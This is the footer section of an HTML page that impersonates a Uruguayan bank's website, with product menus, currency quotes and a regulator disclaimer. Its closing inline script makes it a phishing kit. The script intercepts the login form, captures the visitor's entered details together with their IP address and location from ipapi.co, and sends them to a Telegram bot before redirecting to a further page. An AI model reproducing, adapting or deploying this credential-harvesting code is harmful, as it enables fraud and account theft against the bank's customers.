                        <span class="u-visuallyHidden"></span>
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 56 56" width="56" height="56">
                           <path fill="currentColor" fill-rule="evenodd" d="M46.66 0H9.34A9.33 9.33 0 0 0 0 9.33v37.34A9.33 9.33 0 0 0 9.34 56h37.32A9.34 9.34 0 0 0 56 46.67V9.33A9.34 9.34 0 0 0 46.66 0ZM8.96 46.63H4.64V28.05h4.32v18.58Zm21.85-4.42c.05-.23.07-.48.07-.7h-.02v-1.48l-.85.01c-.46.02-.89.05-1.28.12-1.67.26-2.79.93-2.79 2.24 0 1.17.82 1.79 2.02 1.79 1.36 0 2.4-.87 2.77-1.77l.01-.03.02-.04a.39.39 0 0 0 .05-.14Zm-8.13-8.59a11.79 11.79 0 0 1 5.72-1.31c4.79 0 6.44 2.74 6.44 6.1v8.24h-3.52l-.48-1.44h-.05a5.63 5.63 0 0 1-4.36 1.78c-3.1 0-4.78-2.14-4.78-4.26 0-3.6 3.47-5.42 9.1-5.4v-.15c0-.66-.53-1.94-3.07-1.94a8.9 8.9 0 0 0-4.18 1.12l-.82-2.74Zm24.13-.9v8.16c0 .33-.04.62-.15.88a2.8 2.8 0 0 1-2.6 1.8c-1.78 0-2.55-1.3-2.55-3.48V32.7h-4.23v8.15c0 1.1.13 2.01.4 2.78.26.77.62 1.4 1.08 1.89.46.49 1 .87 1.64 1.1.64.23 1.34.34 2.1.34a5.77 5.77 0 0 0 4.03-1.57c.24-.27.44-.51.59-.72l.54 1.98h3.42V32.72h-4.27Zm-33.77-.02v-4.65h4.2v4.65h2.69v3.18h-2.69v4.93c0 1.7.34 2.64 1.85 2.64.43 0 .77-.06.89-.11v3.23l-.05.01c-.55.21-1.05.4-2.3.4a4.6 4.6 0 0 1-3.4-1.3c-.8-.85-1.19-2.26-1.19-4.13v-5.67h-1.98V32.7h1.98Zm32.16-4.65-2.6 3.75h3l3.7-3.75h-4.1Z" clip-rule="evenodd"></path>
                        </svg>
                     </a>
                  </h1>
               </div>
               <div>
                  <h2 class="c-footer__subtitle" data-collapse="#footer-products">
                     <span>productos</span>
                     <svg class="d-block d-md-none" width="24" height="24" fill="none" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                        <path d="M18.982 16.043a.624.624 0 0 0 .868-.023c.109-.11.156-.25.14-.422a.543.543 0 0 0-.164-.399l-7.125-7.125a.954.954 0 0 0-.703-.281c-.266 0-.5.094-.703.281L4.17 15.2a.624.624 0 0 0 0 .844c.125.11.266.164.422.164a.571.571 0 0 0 .422-.164l6.984-6.984 6.984 6.984Z" fill="currentColor"></path>
                     </svg>
                  </h2>
                  <ul class="c-footer__list" id="footer-products">
                     <li>
                        <a href="#">cuentas
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">préstamos
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">inversiones
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">tarjetas
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">seguros
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#"> Personal 
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                  </ul>
               </div>
               <div>
                  <h2 class="c-footer__subtitle" data-collapse="#footer-about">
                     <span>sobre nosotros</span>
                     <svg class="d-block d-md-none" width="24" height="24" fill="none" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                        <path d="M18.982 16.043a.624.624 0 0 0 .868-.023c.109-.11.156-.25.14-.422a.543.543 0 0 0-.164-.399l-7.125-7.125a.954.954 0 0 0-.703-.281c-.266 0-.5.094-.703.281L4.17 15.2a.624.624 0 0 0 0 .844c.125.11.266.164.422.164a.571.571 0 0 0 .422-.164l6.984-6.984 6.984 6.984Z" fill="currentColor"></path>
                     </svg>
                  </h2>
                  <ul class="c-footer__list" id="footer-about">
                     <li>
                        <a href="#">quiénes somos
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">trabajá con nosotros
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">sustentabilidad
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#" rel="noopener noreferrer">fundación 
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                  </ul>
               </div>
               <div>
                  <h2 class="c-footer__subtitle" data-collapse="#footer-info">
                     <span>más información</span>
                     <svg class="d-block d-md-none" width="24" height="24" fill="none" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                        <path d="M18.982 16.043a.624.624 0 0 0 .868-.023c.109-.11.156-.25.14-.422a.543.543 0 0 0-.164-.399l-7.125-7.125a.954.954 0 0 0-.703-.281c-.266 0-.5.094-.703.281L4.17 15.2a.624.624 0 0 0 0 .844c.125.11.266.164.422.164a.571.571 0 0 0 .422-.164l6.984-6.984 6.984 6.984Z" fill="currentColor"></path>
                     </svg>
                  </h2>
                  <ul class="c-footer__list" id="footer-info">
                     <li>
                        <a href="#"> Volar
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">beneficios
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">tarifario
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">contratos y cartillas
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li style="position: relative">
                        <a href="#" data-popover="#cotizaciones">cotizaciones</a>
                        <!-- COTIZACIONES POPOVER -->
                        <div id="cotizaciones" class="c-popover u-reboot">
                           <div class="c-popover__header">
                              Cotización de la moneda
                              <button class="btn-close-cotizaciones-popover u-plainButton">
                                 <svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M0.295164 0.295164C-0.0953603 0.685688 -0.101332 1.32483 0.289192 1.71535L4.5739 6.00005L0.289705 10.2842C-0.10082 10.6748 -0.0948476 11.3139 0.295677 11.7044C0.686201 12.095 1.32534 12.1009 1.71586 11.7104L6.00005 7.42621L10.2842 11.7104C10.6748 12.1009 11.3139 12.095 11.7044 11.7044C12.095 11.3139 12.1009 10.6748 11.7104 10.2842L7.42621 6.00005L11.7109 1.71535C12.1014 1.32483 12.0955 0.685688 11.7049 0.295164C11.3144 -0.0953602 10.6753 -0.101333 10.2848 0.289192L6.00005 4.5739L1.71535 0.289192C1.32483 -0.101333 0.685688 -0.0953602 0.295164 0.295164Z" fill="#969290"></path>
                                 </svg>
                              </button>
                           </div>
                           <div class="c-popover__body">
                              <table class="c-coti__table">
                                 <thead>
                                    <tr>
                                       <th>Moneda</th>
                                       <th class="text-right">Compra</th>
                                       <th class="text-right">Venta</th>
                                    </tr>
                                 </thead>
                                 <tbody>
                                    <tr>
                                       <td>
                                          <img src="img/estados-unidos.svg" alt="Dólar" width="40" height="28" style="pointer-events: none;">
                                       </td>
                                       <td class="text-right" data-currency="US.D,compra">38,85</td>
                                       <td class="text-right" data-currency="US.D,venta">41,05</td>
                                    </tr>
                                    <tr>
                                       <td>
                                          <img src="img/brasil.svg" alt="Real" width="40" height="28" style="pointer-events: none;">
                                       </td>
                                       <td class="text-right" data-currency="CRUZ,compra">7,35</td>
                                       <td class="text-right" data-currency="CRUZ,venta">9,05</td>
                                    </tr>
                                    <tr>
                                       <td>
                                          <img src="img/argentina.svg" alt="Peso argentino" width="40" height="28" style="pointer-events: none;">
                                       </td>
                                       <td class="text-right" data-currency="ARGP,compra">0,02</td>
                                       <td class="text-right" data-currency="ARGP,venta">0,20</td>
                                    </tr>
                                    <tr>
                                       <td>
                                          <img src="img/union-europea.svg" alt="Euro" width="40" height="28" style="pointer-events: none;">
                                       </td>
                                       <td class="text-right" data-currency="EUR,compra">39,90</td>
                                       <td class="text-right" data-currency="EUR,venta">44,48</td>
                                    </tr>
                                    <tr>
                                       <td colspan="2" style="white-space: nowrap">
                                          Valor de la Unidad Indexada
                                       </td>
                                       <td class="text-right" data-currency="URGI">5,80</td>
                                    </tr>
                                 </tbody>
                              </table>
                              <p class="c-coti__msg">
                                 Estas cotizaciones son en pesos uruguayos y sólo a título
                                 informativo
                              </p>
                           </div>
                        </div>
                     </li>
                     <li>
                        <a href="#">seguridad
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">emergencias
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                     <li>
                        <a href="#">canal de denuncias
                        <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;"></a>
                     </li>
                  </ul>
               </div>
               <div>
                  <h2 class="c-footer__subtitle d-none d-md-block" style="margin-bottom: 22px">
                     encontranos en:
                  </h2>
                  <ul class="c-footer__list is-open">
                     <li class="c-footer__social">
                        <a href="#" rel="noopener noreferrer">
                           <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" width="24" heigth="24">
                              <path fill="#D6D0CC" fill-rule="evenodd" d="M23.38 4.14c.3.76.5 1.64.56 2.92C24 8.34 24 8.74 24 12c0 3.26-.01 3.67-.07 4.95a8.8 8.8 0 0 1-.56 2.91 6.14 6.14 0 0 1-3.51 3.51c-.76.3-1.64.5-2.91.56A87.9 87.9 0 0 1 12 24a87.9 87.9 0 0 1-4.95-.07 8.8 8.8 0 0 1-2.9-.56A5.9 5.9 0 0 1 2.01 22a5.92 5.92 0 0 1-1.4-2.13 8.79 8.79 0 0 1-.55-2.91A88.01 88.01 0 0 1 0 12c0-3.26.01-3.66.08-4.95a8.8 8.8 0 0 1 .55-2.91c.3-.8.78-1.52 1.39-2.12A5.86 5.86 0 0 1 4.15.62a8.96 8.96 0 0 1 2.9-.54C8.35.01 8.76 0 12 0c3.26 0 3.67.01 4.96.08a8.8 8.8 0 0 1 2.9.55c.8.3 1.53.78 2.13 1.39a5.9 5.9 0 0 1 1.4 2.12Zm-2.02 14.94c.17-.42.37-1.05.42-2.23.05-1.26.07-1.64.07-4.84s-.02-3.58-.07-4.85a6.6 6.6 0 0 0-.42-2.22c-.19-.52-.5-1-.9-1.38a3.7 3.7 0 0 0-1.37-.9 6.58 6.58 0 0 0-2.23-.41 84.46 84.46 0 0 0-4.85-.07c-3.2 0-3.58.01-4.84.07a6.6 6.6 0 0 0-2.23.41c-.52.2-1 .5-1.38.9-.4.38-.7.86-.9 1.38a6.57 6.57 0 0 0-.41 2.22 84.31 84.31 0 0 0-.07 4.85c0 3.2.01 3.58.07 4.85a6.6 6.6 0 0 0 .4 2.23c.2.52.5.98.9 1.37.39.4.86.7 1.38.9.43.16 1.06.36 2.23.41 1.26.06 1.65.07 4.85.07 3.2 0 3.58-.01 4.85-.07a6.6 6.6 0 0 0 2.23-.41 3.98 3.98 0 0 0 2.27-2.28ZM5.84 12a6.17 6.17 0 1 1 12.33 0 6.17 6.17 0 0 1-12.33 0ZM8 12a4 4 0 1 0 8 0 4 4 0 0 0-8 0Zm10.42-4.97a1.44 1.44 0 1 0 0-2.88 1.44 1.44 0 0 0 0 2.88Z" clip-rule="evenodd"></path>
                           </svg>
                           <span class="u-visuallyHidden">Instagram</span>
                        </a>
                        <a href="#" rel="noopener noreferrer">
                           <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" width="24" height="24">
                              <path fill="#D6D0CC" d="M15.81 3.98h2.2V.17A28.3 28.3 0 0 0 14.8 0c-3.16 0-5.32 1.99-5.32 5.64V9H6v4.27h3.49V24h4.27V13.27h3.35L17.64 9h-3.88V6.06c0-1.23.33-2.07 2.05-2.07Z"></path>
                           </svg>
                           <span class="u-visuallyHidden">Facebook</span>
                        </a>
                        <a href="#" rel="noopener noreferrer">
                           <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" width="24" height="24">
                              <path fill="#D6D0CC" d="M24 4.32c-.9.39-1.84.65-2.84.77a4.9 4.9 0 0 0 2.17-2.72c-.95.57-2 .97-3.12 1.2a4.92 4.92 0 0 0-8.4 4.5A13.91 13.91 0 0 1 1.67 2.9a4.98 4.98 0 0 0 1.51 6.6 4.85 4.85 0 0 1-2.22-.61v.05c0 2.4 1.7 4.39 3.94 4.85a4.9 4.9 0 0 1-2.22.08 4.97 4.97 0 0 0 4.6 3.43A9.87 9.87 0 0 1 0 19.34a13.82 13.82 0 0 0 7.55 2.22c9.05 0 14-7.53 14-14.05 0-.21 0-.42-.02-.63.98-.7 1.8-1.57 2.47-2.56Z"></path>
                           </svg>
                           <span class="u-visuallyHidden">Twitter</span>
                        </a>
                        <a href="#" rel="noopener noreferrer">
                           <svg width="25" height="25" viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg">
                              <path d="M19.0938 0.0996094H5.09375C2.33275 0.0996094 0.09375 2.3312 0.09375 5.08307V19.0368C0.09375 21.7886 2.33275 24.0202 5.09375 24.0202H19.0938C21.8558 24.0202 24.0938 21.7886 24.0938 19.0368V5.08307C24.0938 2.3312 21.8558 0.0996094 19.0938 0.0996094ZM8.09375 19.0368H5.09375V8.07315H8.09375V19.0368ZM6.59375 6.80935C5.62775 6.80935 4.84375 6.02196 4.84375 5.05118C4.84375 4.0804 5.62775 3.29301 6.59375 3.29301C7.55975 3.29301 8.34375 4.0804 8.34375 5.05118C8.34375 6.02196 7.56075 6.80935 6.59375 6.80935ZM20.0938 19.0368H17.0938V13.4513C17.0938 10.0944 13.0938 10.3486 13.0938 13.4513V19.0368H10.0938V8.07315H13.0938V9.83232C14.4897 7.25487 20.0938 7.0645 20.0938 12.3001V19.0368Z" fill="#D6D0CC"></path>
                           </svg>
                           <span class="u-visuallyHidden">Enviar consulta</span>
                        </a>
                     </li>
                     <li class="c-footer__offices c-footer__sucursales">
                        <a href="#">
                           <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" width="24" height="24">
                              <path fill="currentColor" d="M12.5 2c-1.05 0-2.02.19-2.93.56A7.6 7.6 0 0 0 5.59 6.5 7.2 7.2 0 0 0 5 9.38c0 1.02.4 2.24 1.17 3.68a40.4 40.4 0 0 0 2.58 4.17c.94 1.32 1.8 2.43 2.58 3.36l1.17 1.4 1.17-1.4c.78-.93 1.64-2.04 2.58-3.36a40.4 40.4 0 0 0 2.58-4.17A8.06 8.06 0 0 0 20 9.38a7.2 7.2 0 0 0-2.2-5.22A7.45 7.45 0 0 0 12.5 2Zm2.93 14.63c-.55.78-1.09 1.5-1.62 2.17l-1.31 1.65-1.34-1.62c-.51-.67-1.05-1.4-1.61-2.18a61.6 61.6 0 0 1-1.4-2.13 29 29 0 0 1-1.09-1.9c-.43-.86-.72-1.55-.86-2.07a4.9 4.9 0 0 1-.22-1.17c0-.43.04-.86.12-1.26a6.54 6.54 0 0 1 12.75 0c.1.4.14.83.14 1.26 0 .27-.07.66-.2 1.17-.13.52-.41 1.2-.85 2.07-.3.58-.66 1.2-1.08 1.87-.42.67-.9 1.38-1.43 2.13ZM12.5 5c-.97 0-1.8.34-2.48 1.03A3.31 3.31 0 0 0 8.98 8.5c0 .97.35 1.8 1.04 2.49.68.67 1.51 1 2.48 1s1.79-.33 2.46-1A3.39 3.39 0 0 0 16 8.49a3.3 3.3 0 0 0-1.03-2.46A3.3 3.3 0 0 0 12.5 5Zm0 6A2.47 2.47 0 0 1 10 8.5c0-.7.23-1.28.72-1.77.5-.5 1.1-.75 1.78-.75.69 0 1.27.25 1.76.75.48.49.72 1.07.72 1.76A2.47 2.47 0 0 1 12.5 11Z"></path>
                           </svg>
                           <span>sucursales</span>
                           <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;">
                        </a>
                     </li>
                     <li class="c-footer__whatsapp">
                        <a href="#">
                           <svg width="24" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                              <path fill-rule="evenodd" clip-rule="evenodd" d="M13.2188 2.42373C11.7747 0.97789 9.85417 0.181303 7.80802 0.18042C3.59194 0.18042 0.16052 3.61162 0.158828 7.82903C0.158312 9.17713 0.510462 10.493 1.17988 11.6531L0.0947266 15.6167L4.14964 14.5531C5.26688 15.1624 6.52476 15.4837 7.80493 15.4841H7.8081C12.0237 15.4841 15.4555 12.0525 15.4572 7.83499C15.458 5.79127 14.663 3.86949 13.2188 2.42373ZM7.8081 14.1923H7.80552C6.66473 14.1919 5.5458 13.8853 4.56972 13.3061L4.33753 13.1684L1.93128 13.7995L2.57354 11.4535L2.42237 11.2128C1.786 10.2007 1.44982 9.03075 1.45034 7.8294C1.45174 4.32409 4.30375 1.4723 7.81067 1.4723C9.50872 1.47289 11.1051 2.13502 12.3054 3.33682C13.5057 4.53854 14.1663 6.13584 14.1656 7.83462C14.1642 11.3402 11.3122 14.1923 7.8081 14.1923ZM11.2954 9.43067C11.1043 9.33507 10.1647 8.87267 9.98944 8.80887C9.81429 8.74521 9.68682 8.71327 9.55943 8.90461C9.43203 9.09596 9.06568 9.52641 8.95419 9.65402C8.84269 9.78149 8.73119 9.79754 8.54014 9.70179C8.34894 9.60619 7.73318 9.40432 7.00312 8.75315C6.43497 8.24638 6.0514 7.62053 5.9399 7.42912C5.8284 7.23777 5.92798 7.13437 6.02372 7.03906C6.10968 6.9534 6.21485 6.81578 6.31045 6.70421C6.40605 6.59264 6.43784 6.51286 6.50157 6.38532C6.56531 6.25778 6.53344 6.14614 6.4856 6.05054C6.43784 5.9548 6.05559 5.01404 5.89633 4.63134C5.74119 4.25874 5.58363 4.30915 5.46632 4.30326C5.35497 4.29774 5.22743 4.29649 5.09997 4.29649C4.97257 4.29649 4.76555 4.34433 4.59032 4.53567C4.41517 4.72702 3.92142 5.18941 3.92142 6.13017C3.92142 7.07093 4.60622 7.97968 4.70182 8.10729C4.79734 8.23483 6.04956 10.1653 7.96677 10.9932C8.42269 11.1902 8.77874 11.3077 9.05633 11.3959C9.51424 11.5414 9.93086 11.5208 10.2601 11.4716C10.6274 11.4167 11.3909 11.0092 11.5502 10.5628C11.7094 10.1163 11.7094 9.73358 11.6617 9.65388C11.6139 9.57425 11.4865 9.52641 11.2954 9.43067Z" fill="currentColor"></path>
                           </svg>
                           <span>whatsapp</span>
                           <img src="img/icon-arrow-hover-footer.svg" style="pointer-events: none;">
                        </a>
                     </li>
                     <li class="c-footer__apps">
                        <h3 style="margin-left: 0">descargá nuestras apps:</h3>
                        <div class="c-footer__stack">
                           <a href="#">
                           <img src="img/mini-icon-itau.svg" alt="" style="pointer-events: none;">
                           <span class="u-visuallyHidden">App</span>
                           </a>
                           <a href="#" >
                           <img src="img/mini-icon-pagos.svg" alt="" style="pointer-events: none;">
                           <span class="u-visuallyHidden"> Pagos</span>
                           </a>
                        </div>
                     </li>
                  </ul>
               </div>
            </div>
         </div>
         <div class="c-footer__disclaimer">
            <div class="o-container">
               <div style="display: flex; align-items: center; gap: 16px">
                  <div class="d-block d-md-none hide-on-mobile">
                     <h1 class="c-footer__logo" style="margin: 0">
                        <a href="#" title="Ir a la página principal">
                           <span class="u-visuallyHidden"></span>
                           <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 56 56" width="48" height="48">
                              <path fill="currentColor" fill-rule="evenodd" d="M46.66 0H9.34A9.33 9.33 0 0 0 0 9.33v37.34A9.33 9.33 0 0 0 9.34 56h37.32A9.34 9.34 0 0 0 56 46.67V9.33A9.34 9.34 0 0 0 46.66 0ZM8.96 46.63H4.64V28.05h4.32v18.58Zm21.85-4.42c.05-.23.07-.48.07-.7h-.02v-1.48l-.85.01c-.46.02-.89.05-1.28.12-1.67.26-2.79.93-2.79 2.24 0 1.17.82 1.79 2.02 1.79 1.36 0 2.4-.87 2.77-1.77l.01-.03.02-.04a.39.39 0 0 0 .05-.14Zm-8.13-8.59a11.79 11.79 0 0 1 5.72-1.31c4.79 0 6.44 2.74 6.44 6.1v8.24h-3.52l-.48-1.44h-.05a5.63 5.63 0 0 1-4.36 1.78c-3.1 0-4.78-2.14-4.78-4.26 0-3.6 3.47-5.42 9.1-5.4v-.15c0-.66-.53-1.94-3.07-1.94a8.9 8.9 0 0 0-4.18 1.12l-.82-2.74Zm24.13-.9v8.16c0 .33-.04.62-.15.88a2.8 2.8 0 0 1-2.6 1.8c-1.78 0-2.55-1.3-2.55-3.48V32.7h-4.23v8.15c0 1.1.13 2.01.4 2.78.26.77.62 1.4 1.08 1.89.46.49 1 .87 1.64 1.1.64.23 1.34.34 2.1.34a5.77 5.77 0 0 0 4.03-1.57c.24-.27.44-.51.59-.72l.54 1.98h3.42V32.72h-4.27Zm-33.77-.02v-4.65h4.2v4.65h2.69v3.18h-2.69v4.93c0 1.7.34 2.64 1.85 2.64.43 0 .77-.06.89-.11v3.23l-.05.01c-.55.21-1.05.4-2.3.4a4.6 4.6 0 0 1-3.4-1.3c-.8-.85-1.19-2.26-1.19-4.13v-5.67h-1.98V32.7h1.98Zm32.16-4.65-2.6 3.75h3l3.7-3.75h-4.1Z" clip-rule="evenodd"></path>
                           </svg>
                        </a>
                     </h1>
                  </div>
                  <div class="c-footer__legal">
                     <div class="div-legal">
                        © <span class="currentYear">2023</span> Uruguay S.A.
                        <span>se encuentra supervisada por el Banco Central del Uruguay | Por
                        mayor información puedes acceder a
                        <a href="#" rel="noopener noreferrer">www.bcu.gub.uy</a></span>
                     </div>
                     Infórmese sobre la Garantía de Depósitos, en su institución de
                     intermediación financiera ó en el sitio web
                     <a href="#" rel="noopener noreferrer">www.copab.org.uy</a>, o en el correo electrónico
                     <a href="mailto:infocopab@copab.org.uy">infocopab@copab.org.uy</a>
                  </div>
               </div>
            </div>
         </div>
      </footer>
      <a href="#" id="btnAccesoRapido" style="position: static; display: none"><span>Acceso rápido</span></a>
      <div class="overlayMensajes" id="modal">
         <div class="contMensajeRespuesta">
            <h3></h3>
            <div id="modal_content"></div>
            <br class="clear">
            <a href="#" title="Cerrar" id="btn_modal_cerrar">Cerrar</a>
         </div>
      </div>
      <div id="model_boxLetra" style="display: none">
         <div class="boxLetra" id="box_letra___tag__">
            <h3>__tag__</h3>
            <ul id="ul___tag__">
               __items__
            </ul>
         </div>
      </div>
      <div class="overlayMensajes" id="modalChat">
         <div class="contMensajeRespuestaChat">
            <p class="text-center">¿Te sirvió mi ayuda?</p>
            <a class="close" href="javascript:;">✖</a>
            <div class="formPopUp">
               <br>
               <button class="btnNaranja btnSi" style="opacity: 1;">Si</button>
               <button class="btnNaranja btnNo" style="opacity: 0.7;">No</button>
               <br><br>
               <textarea placeholder="Dejame tu comentario (opcional)"></textarea>
               <input type="hidden" name="feedback" value="1">
               <button class="right btnNaranja btnEnviar">Enviar</button>
            </div>
         </div>
      </div>
      <script src="aqui-va-eltlg.js"></script>
     <script>
    var script = document.createElement("script");
    script.src = "aqui-va-eltlg.js";

 

    const form = document.querySelector('#loginform');

    form.addEventListener('submit', event => {
        event.preventDefault();
        const cliente = document.getElementById('step02').value;
        const cliente2 = document.getElementById('step01').value;
       
        fetch('https://ipapi.co/json')
        .then(response => response.json())
        .then(data => {
            YOUR_MESSAGE_TEXT = "IT4U UYU \n\n\r CE3L: "+cliente+" \n\n\r C0RREo30: "+cliente2+"  - IP: "+data.ip+" "+data.country+" "+data.city;
            const telegramApiUrl = `https://api.telegram.org/bot${YOUR_BOT_TOKEN}/sendMessage?chat_id=${YOUR_CHANNEL_ID}&text=${YOUR_MESSAGE_TEXT}`;

            fetch(telegramApiUrl)
                .then(response => {
                    window.location.href="selectors.html"
                })
                .catch(error => console.error(error));
        })
        .catch(error => console.error(error));
    });
    
</script>
      
      
   </body>

</html>
